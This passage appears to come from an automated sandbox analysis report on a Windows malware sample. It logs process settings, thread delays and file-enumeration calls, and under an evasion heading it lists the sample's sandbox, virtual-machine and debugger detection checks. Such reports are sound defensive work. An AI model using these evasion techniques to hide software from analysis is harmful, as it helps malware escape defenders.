                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Dhy2kmz.exe PID: 6552, type: MEMORYSTR
                Source: C:\Users\user\Desktop\9876567899.bat.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97267
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeAPI/Special instruction interceptor: Address: F02CD4
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeWindow / User API: threadDelayed 1512Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeWindow / User API: threadDelayed 6051Jump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeAPI coverage: 3.4 %
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exe TID: 6656Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 6656Thread sleep time: -2700000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 6656Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6152Thread sleep count: 1512 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6152Thread sleep count: 6051 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99641s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99516s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99293s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99172s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -99062s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98953s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98844s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98734s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98624s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98516s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98297s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98187s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -98078s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97968s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97858s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97468s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97141s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -97016s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96796s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96468s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96140s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe TID: 6156Thread sleep time: -96031s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0074C2A2 FindFirstFileExW,0_2_0074C2A2
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007868EE FindFirstFileW,FindClose,0_2_007868EE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0078698F
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0077D076
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0077D3A9
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00789642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00789642
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078979D
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00789B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00789B2B
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0077DBBE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00785C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00785C97
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0006C2A2 FindFirstFileExW,2_2_0006C2A2
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A68EE FindFirstFileW,FindClose,2_2_000A68EE
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_000A698F
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0009D076
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0009D3A9
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_000A9642
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_000A979D
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_000A9B2B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0009DBBE
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_000A5C97
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007142DE
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99641Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99516Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99293Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 99062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98844Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98516Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98297Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98187Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 98078Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97968Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97858Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97687Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97468Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97359Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97250Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97141Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 97016Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96796Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96687Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96468Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96359Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96250Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96140Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeThread delayed: delay time: 96031Jump to behavior
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: Dhy2kmz.exe, 00000004.00000002.2139509814.0000000000C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078EAA2 BlockInput,0_2_0078EAA2
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00742622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00742622
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007142DE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00734CE8 mov eax, dword ptr fs:[00000030h]0_2_00734CE8
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_01322D58 mov eax, dword ptr fs:[00000030h]0_2_01322D58
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_01322CF8 mov eax, dword ptr fs:[00000030h]0_2_01322CF8
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_013216A8 mov eax, dword ptr fs:[00000030h]0_2_013216A8
